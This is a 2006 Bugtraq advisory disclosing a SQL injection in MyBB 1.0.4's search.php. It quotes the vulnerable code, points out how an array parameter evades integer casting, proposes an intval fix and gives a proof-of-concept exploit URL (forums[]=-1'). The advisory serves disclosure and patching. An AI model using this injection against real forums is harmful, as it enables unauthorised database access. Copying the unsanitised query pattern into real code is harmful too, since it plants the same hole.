Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

MyBB 1.0.4 New SQL Injection

From: o.y.6 () hotmail com
Date: 2 Mar 2006 18:03:44 -0000
MyBB 1.0.4 New SQL Injection
        
                D3vil-0x1
                
                File :- search.php

580 to 592

/* _START_ */

if($mybb->input['forums'] != "all")

        {

                if(!is_array($mybb->input['forums'])) <<-- We Break It By forums[]=-1

                {

                        $mybb->input['forums'] = array(intval($mybb->input['forums']));

                }

                foreach($mybb->input['forums'] as $forum)

                {

                        if(!$searchin[$forum])

                        {

                                $query = $db->query("SELECT f.fid FROM ".TABLE_PREFIX."forums f LEFT JOIN 
".TABLE_PREFIX."forumpermissions p ON (f.fid=p.fid AND p.gid='".$mybb->user[usergroup]."') WHERE 
INSTR(CONCAT(',',parentlist,','),',$forum,') > 0 AND active!='no' AND (ISNULL(p.fid) OR p.cansearch='yes')");

                                if($db->num_rows($query) == 1)

                                {

                                        $wheresql .= " AND t.fid='$forum' "; <<-- First SQL Injection

                                        $searchin[$fid] = 1;

}


Fix it :-

Add :-

$forum = intval($forum); To Line 568

/* _END_*/

/* Exploit */

[username] = any username in victem forum

[HOST]/[PATH]/search.php?action=do_search&postthread=1&author=[username]&matchusername=1&forums[]=-1'
Previous By Date Next
Previous By Thread Next

Current thread: